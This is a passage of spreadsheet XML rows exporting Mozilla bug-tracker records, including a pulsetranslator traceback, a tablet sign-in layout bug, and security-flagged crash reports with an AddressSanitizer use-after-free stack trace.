      <c r="A5286" t="n">
        <v>1094272</v>
      </c>
      <c r="B5286" t="inlineStr">
        <is>
          <t>2014-11-05 08:57:11 -0800</t>
        </is>
      </c>
      <c r="C5286" t="inlineStr">
        <is>
          <t>[pulsetranslator] With SSL enabled publishing of normalized messages get stuck</t>
        </is>
      </c>
      <c r="D5286" t="inlineStr">
        <is>
          <t>2019-05-10 11:20:09 -0700</t>
        </is>
      </c>
      <c r="E5286" t="n">
        <v>1</v>
      </c>
      <c r="F5286" t="n">
        <v>1</v>
      </c>
      <c r="G5286" t="n">
        <v>4</v>
      </c>
      <c r="H5286" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5286" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J5286" t="inlineStr">
        <is>
          <t>Pulse</t>
        </is>
      </c>
      <c r="K5286" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5286" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5286" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5286" t="inlineStr"/>
      <c r="Q5286" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5286" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5286" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5286" t="n">
        <v>1</v>
      </c>
      <c r="U5286" t="n">
        <v>0</v>
      </c>
      <c r="V5286" t="n">
        <v>35</v>
      </c>
      <c r="W5286" t="inlineStr">
        <is>
          <t>We are seeing errors like this in the pulsetranslator:
build.mozilla-aurora.win32.opt.l10n.nightly.mozilla-aurora-win32-l10n-nightly
Traceback (most recent call last):
  File "/home/webtools/apps/pulsetranslator/src/pulsetranslator/pulsetranslator/translatorqueues.py", line 26, in publish_message
    publisher.publish(msg)
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/mozillapulse/publishers.py", line 62, in publish
    routing_key=message.routing_key)
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/kombu/messaging.py", line 85, in __init__
    self.revive(self._channel)
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/kombu/messaging.py", line 218, in revive
    self.declare()
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/kombu/messaging.py", line 105, in declare
    self.exchange.declare()
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/kombu/entity.py", line 163, in declare
    return self.channel.exchange_declare(
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/kombu/abstract.py", line 115, in channel
    channel = self._channel = channel()
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/kombu/utils/__init__.py", line 422, in __call__
    value = self.__value__ = self.__contract__()
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/kombu/messaging.py", line 205, in &lt;lambda&gt;
    channel = ChannelPromise(lambda: connection.default_channel)
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/kombu/connection.py", line 758, in default_channel
    self._default_channel = self.channel()
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/kombu/connection.py", line 242, in channel
    chan = self.transport.create_channel(self.connection)
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/kombu/transport/pyamqp.py", line 88, in create_channel
    return connection.channel()
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/amqp/connection.py", line 281, in channel
    return self.Channel(self, channel_id)
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/amqp/channel.py", line 99, in __init__
    self._x_open()
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/amqp/channel.py", line 427, in _x_open
    (20, 11),  # Channel.open_ok
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/amqp/abstract_channel.py", line 67, in wait
    self.channel_id, allowed_methods)
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/amqp/connection.py", line 240, in _wait_method
    self.method_reader.read_method()
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/amqp/method_framing.py", line 189, in read_method
    raise m
IOError: Socket closed
This may be related to the network issues reported in bug 1083166.  Regardless, we should never drop messages.  
We could put in a simple retry loop, but this won't help if there's a prolonged outage.  pulsetranslator should be queuing its messages somewhere and only removing them from the queue when the publish() call succeeds.</t>
        </is>
      </c>
      <c r="X5286" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5287">
      <c r="A5287" t="n">
        <v>870035</v>
      </c>
      <c r="B5287" t="inlineStr">
        <is>
          <t>2013-05-08 11:37:33 -0700</t>
        </is>
      </c>
      <c r="C5287" t="inlineStr">
        <is>
          <t>Cannot "sign in" on tablet</t>
        </is>
      </c>
      <c r="D5287" t="inlineStr">
        <is>
          <t>2013-06-10 08:53:16 -0700</t>
        </is>
      </c>
      <c r="E5287" t="n">
        <v>1</v>
      </c>
      <c r="F5287" t="n">
        <v>1</v>
      </c>
      <c r="G5287" t="n">
        <v>6</v>
      </c>
      <c r="H5287" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5287" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J5287" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K5287" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L5287" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5287" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5287" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5287" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5287" t="inlineStr">
        <is>
          <t>[fireplace] p=1</t>
        </is>
      </c>
      <c r="Q5287" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5287" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5287" t="inlineStr">
        <is>
          <t>2013-06-13</t>
        </is>
      </c>
      <c r="T5287" t="n">
        <v>1</v>
      </c>
      <c r="U5287" t="n">
        <v>0</v>
      </c>
      <c r="V5287" t="n">
        <v>6</v>
      </c>
      <c r="W5287" t="inlineStr">
        <is>
          <t>Because of our responsive-design breakpoints, we hide the "Sign in" button on mobile/desktop. 
On desktop there is a "Sign in" link in the header: http://f.cl.ly/items/1T3S1V0i0z1E3B0P1S2c/Screen%20Shot%202013-05-08%20at%2011.36.11%20AM.png
On mobile we show the "Sign in" link on the Account Settings: http://f.cl.ly/items/3s0e3z1A1S3Z1B300e2q/Screen%20Shot%202013-05-08%20at%2011.34.57%20AM.png
On mobile/tablet that "Sign in" link becomes a settings gear icon: http://f.cl.ly/items/132S0P220D0k421T3i14/Screen%20Shot%202013-05-08%20at%2011.36.34%20AM.png
On tablet unfortunately there is no "Sign in" button on the Account Settings page: http://f.cl.ly/items/212a1i2H1Q0b3f1l0N03/Screen%20Shot%202013-05-08%20at%2010.27.18%20AM.png</t>
        </is>
      </c>
      <c r="X5287" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5288">
      <c r="A5288" t="n">
        <v>944851</v>
      </c>
      <c r="B5288" t="inlineStr">
        <is>
          <t>2013-11-29 21:01:19 -0800</t>
        </is>
      </c>
      <c r="C5288" t="inlineStr">
        <is>
          <t>Array out-of-bounds [@ mozilla::dom::AudioParamTimeline::AudioNodeInputValue]</t>
        </is>
      </c>
      <c r="D5288" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:29 -0800</t>
        </is>
      </c>
      <c r="E5288" t="n">
        <v>1</v>
      </c>
      <c r="F5288" t="n">
        <v>1</v>
      </c>
      <c r="G5288" t="n">
        <v>3</v>
      </c>
      <c r="H5288" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5288" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5288" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K5288" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5288" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5288" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5288" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5288" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5288" t="inlineStr">
        <is>
          <t>[adv-main27+]</t>
        </is>
      </c>
      <c r="Q5288" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5288" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5288" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T5288" t="n">
        <v>1</v>
      </c>
      <c r="U5288" t="n">
        <v>0</v>
      </c>
      <c r="V5288" t="n">
        <v>15</v>
      </c>
      <c r="W5288" t="inlineStr">
        <is>
          <t>Created attachment 8340595
testcase
Assertion failure: i &lt; Length() (invalid array index), at nsTArray.h:887</t>
        </is>
      </c>
      <c r="X5288" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5289">
      <c r="A5289" t="n">
        <v>805294</v>
      </c>
      <c r="B5289" t="inlineStr">
        <is>
          <t>2012-10-24 18:06:25 -0700</t>
        </is>
      </c>
      <c r="C5289" t="inlineStr">
        <is>
          <t>RegExpCompartment::sweep should mark the atom if the entry isn't removed</t>
        </is>
      </c>
      <c r="D5289" t="inlineStr">
        <is>
          <t>2014-11-19 19:36:08 -0800</t>
        </is>
      </c>
      <c r="E5289" t="n">
        <v>1</v>
      </c>
      <c r="F5289" t="n">
        <v>1</v>
      </c>
      <c r="G5289" t="n">
        <v>3</v>
      </c>
      <c r="H5289" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5289" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5289" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5289" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5289" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5289" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5289" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5289" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5289" t="inlineStr">
        <is>
          <t>[adv-main19+]</t>
        </is>
      </c>
      <c r="Q5289" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5289" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5289" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T5289" t="n">
        <v>1</v>
      </c>
      <c r="U5289" t="n">
        <v>0</v>
      </c>
      <c r="V5289" t="n">
        <v>19</v>
      </c>
      <c r="W5289" t="inlineStr">
        <is>
          <t>Normally, we clear out all entries of the regexp cache.  The exception is when a regexp is currently executing and then that regexp gets to stay in the cache.  In this case, we fail to mark the JSAtom that serves as the key, so it can become garbage.  IIUC, we don't use the key other than for equality matching, so this error only manifests itself as the cache returning the wrong regexp for the given source (from the same compartment, so not an information leak).
I tried to write a test-case, but the conservative GC thwarted all my attempts, since the window of opportunity is small.  [Credit to Ginn Chen for reproducing and tracking down this bug.]</t>
        </is>
      </c>
      <c r="X5289" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5290">
      <c r="A5290" t="n">
        <v>1581084</v>
      </c>
      <c r="B5290" t="inlineStr">
        <is>
          <t>2019-09-13 03:14:54 -0700</t>
        </is>
      </c>
      <c r="C5290" t="inlineStr">
        <is>
          <t>mozilla::EventListenerManager::AddEventListenerInternal</t>
        </is>
      </c>
      <c r="D5290" t="inlineStr">
        <is>
          <t>2024-05-30 10:02:38 -0700</t>
        </is>
      </c>
      <c r="E5290" t="n">
        <v>1</v>
      </c>
      <c r="F5290" t="n">
        <v>1</v>
      </c>
      <c r="G5290" t="n">
        <v>3</v>
      </c>
      <c r="H5290" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5290" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5290" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5290" t="inlineStr">
        <is>
          <t>71 Branch</t>
        </is>
      </c>
      <c r="L5290" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5290" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5290" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5290" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5290" t="inlineStr">
        <is>
          <t>[adv-main71+][adv-esr68.3+]</t>
        </is>
      </c>
      <c r="Q5290" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5290" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5290" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T5290" t="n">
        <v>1</v>
      </c>
      <c r="U5290" t="n">
        <v>0</v>
      </c>
      <c r="V5290" t="n">
        <v>25</v>
      </c>
      <c r="W5290" t="inlineStr">
        <is>
          <t>I'm seeing this crash quite regularly while fuzzing, however the testcases are not reproducible. If we can find a way to reliable trigger a situation where `nsDocShell::CreateAboutBlankContentViewer` is called in `EnsureContentViewer` I should be to craft a testcase. I am seeing this on ondevicemotion and ondeviceorientation events and also with a slightly different stack with onstorage event on the window object.
```
=================================================================
==8535==ERROR: AddressSanitizer: heap-use-after-free on address 0x611001e24504 at pc 0x7ff429b5b3e7 bp 0x7fff90876a10 sp 0x7fff90876a08
READ of size 1 at 0x611001e24504 thread T0 (Web Content)
    #0 0x7ff429b5b3e6 in IsApzAwareListener /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1680:29
    #1 0x7ff429b5b3e6 in mozilla::EventListenerManager::AddEventListenerInternal(mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt;, mozilla::EventMessage, nsAtom*, mozilla::EventListenerFlags const&amp;, bool, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:396
    #2 0x7ff429b5eb97 in mozilla::EventListenerManager::SetEventHandlerInternal(nsAtom*, mozilla::TypedEventHandler const&amp;, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:728:5
    #3 0x7ff429b6a5a7 in mozilla::EventListenerManager::SetEventHandler(nsAtom*, mozilla::dom::EventHandlerNonNull*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1529:3
    #4 0x7ff4287d5d5b in SetOndeviceorientation /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventNameList.h:326:1
    #5 0x7ff4287d5d5b in mozilla::dom::Window_Binding::set_ondeviceorientation(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindowInner*, JSJitSetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:6780
    #6 0x7ff4293cb266 in bool mozilla::dom::binding_detail::GenericSetter&lt;mozilla::dom::binding_detail::MaybeGlobalThisPolicy&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3121:8
    #7 0x7ff42ffb33a7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447:13
    #8 0x7ff42ffb33a7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:539
    #9 0x7ff42ffb943d in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:594:10
    #10 0x7ff42ffb943d in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:610
    #11 0x7ff42ffb943d in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:748
    #12 0x7ff4304fca53 in SetExistingProperty(JSContext*, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyResult&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2932:8
    #13 0x7ff4304f5521 in bool js::NativeSetProperty&lt;(js::QualifiedBool)1&gt;(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2961:14
    #14 0x7ff4301fea57 in SetProperty /builds/worker/workspace/build/src/js/src/vm/ObjectOperations-inl.h:283:10
    #15 0x7ff4301fea57 in js::ForwardingProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:149
    #16 0x7ff426807ac0 in nsOuterWindowProxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:944:23
    #17 0x7ff4301d38c1 in setInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:395:19
    #18 0x7ff4301d38c1 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:403
    #19 0x7ff42ff91878 in SetProperty /builds/worker/workspace/build/src/js/src/vm/ObjectOperations-inl.h:280:12
    #20 0x7ff42ff91878 in SetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:269
    #21 0x7ff42ff91878 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2849
    #22 0x7ff42ff7ccef in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:424:10
    #23 0x7ff42ffb9c6f in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:786:13
    #24 0x7ff43009eb33 in js::DirectEvalStringFromIon(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JSString*&gt;, unsigned char*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:422:10
    #25 0x308de91b36ac  (&lt;unknown module&gt;)
0x611001e24504 is located 196 bytes inside of 256-byte region [0x611001e24440,0x611001e24540)
freed by thread T0 (Web Content) here:
    #0 0x55b630990a92 in __interceptor_free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7ff422678916 in Free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:197:34
    #2 0x7ff422678916 in nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::ShrinkCapacity(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:229
    #3 0x7ff429b58319 in Clear /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTObserverArray.h:248:12
    #4 0x7ff429b58319 in RemoveAllListenersSilently /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:147
    #5 0x7ff429b58319 in mozilla::EventListenerManager::Disconnect() /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1315
    #6 0x7ff4267a8b60 in nsGlobalWindowInner::FreeInnerObjects() /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:1102:23
    #7 0x7ff42681240b in nsGlobalWindowOuter::SetNewDocument(mozilla::dom::Document*, nsISupports*, bool, mozilla::dom::WindowGlobalChild*) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:2231:19
    #8 0x7ff42c4ebb35 in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::dom::WindowGlobalChild*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:983:22
    #9 0x7ff42c4eaefa in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::dom::WindowGlobalChild*) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:743:10
    #10 0x7ff42f136c96 in nsDocShell::SetupNewViewer(nsIContentViewer*, mozilla::dom::WindowGlobalChild*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8438:7
    #11 0x7ff42f135b79 in nsDocShell::Embed(nsIContentViewer*, mozilla::dom::WindowGlobalChild*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6217:17
    #12 0x7ff42f140bcc in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIPrincipal*, nsIContentSecurityPolicy*, nsIURI*, bool, bool, mozilla::dom::WindowGlobalChild*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7052:14
    #13 0x7ff42f0eb329 in nsDocShell::EnsureContentViewer() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6887:17
    #14 0x7ff42f117ba7 in GetDocument /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:3590:3
    #15 0x7ff42f117ba7 in non-virtual thunk to nsDocShell::GetDocument() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #16 0x7ff4266f3ace in nsContentUtils::ShouldResistFingerprinting(nsIDocShell*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:1967:48
    #17 0x7ff42b374fe2 in nsDeviceSensors::IsSensorAllowedByPref(unsigned int, nsIDOMWindow*) /builds/worker/workspace/build/src/dom/system/nsDeviceSensors.cpp:574:11
    #18 0x7ff42b37550c in nsDeviceSensors::AddWindowListener(unsigned int, nsIDOMWindow*) /builds/worker/workspace/build/src/dom/system/nsDeviceSensors.cpp:156:8
    #19 0x7ff4267ed998 in nsGlobalWindowInner::EnableDeviceSensor(unsigned int) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:5973:9
    #20 0x7ff429b59449 in EnableDevice /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:478:15
    #21 0x7ff429b59449 in mozilla::EventListenerManager::AddEventListenerInternal(mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt;, mozilla::EventMessage, nsAtom*, mozilla::EventListenerFlags const&amp;, bool, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:290
    #22 0x7ff429b5eb97 in mozilla::EventListenerManager::SetEventHandlerInternal(nsAtom*, mozilla::TypedEventHandler const&amp;, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:728:5
    #23 0x7ff429b6a5a7 in mozilla::EventListenerManager::SetEventHandler(nsAtom*, mozilla::dom::EventHandlerNonNull*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1529:3
    #24 0x7ff4287d5d5b in SetOndeviceorientation /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventNameList.h:326:1
    #25 0x7ff4287d5d5b in mozilla::dom::Window_Binding::set_ondeviceorientation(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindowInner*, JSJitSetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:6780
    #26 0x7ff4293cb266 in bool mozilla::dom::binding_detail::GenericSetter&lt;mozilla::dom::binding_detail::MaybeGlobalThisPolicy&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3121:8
    #27 0x7ff42ffb33a7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447:13
    #28 0x7ff42ffb33a7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:539
    #29 0x7ff42ffb943d in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:594:10
    #30 0x7ff42ffb943d in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:610
    #31 0x7ff42ffb943d in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:748
    #32 0x7ff4304fca53 in SetExistingProperty(JSContext*, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyResult&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2932:8
    #33 0x7ff4304f5521 in bool js::NativeSetProperty&lt;(js::QualifiedBool)1&gt;(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2961:14
    #34 0x7ff4301fea57 in SetProperty /builds/worker/workspace/build/src/js/src/vm/ObjectOperations-inl.h:283:10
    #35 0x7ff4301fea57 in js::ForwardingProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:149
    #36 0x7ff426807ac0 in nsOuterWindowProxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:944:23
    #37 0x7ff4301d38c1 in setInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:395:19
    #38 0x7ff4301d38c1 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:403
    #39 0x7ff42ff91878 in SetProperty /builds/worker/workspace/build/src/js/src/vm/ObjectOperations-inl.h:280:12
    #40 0x7ff42ff91878 in SetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:269
    #41 0x7ff42ff91878 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2849
    #42 0x7ff42ff7ccef in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:424:10
previously allocated by thread T0 (Web Content) here:
    #0 0x55b63099122f in __interceptor_realloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:165:3
    #1 0x55b6309c668d in moz_xrealloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:72:18
    #2 0x7ff4226777a9 in Realloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:204:12
    #3 0x7ff4226777a9 in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::EnsureCapacity&lt;nsTArrayInfallibleAllocator&gt;(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:191
    #4 0x7ff429b588db in ExtendCapacity&lt;nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:117:16
    #5 0x7ff429b588db in AppendElements&lt;nsTArrayInfallibleAllocator&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1691
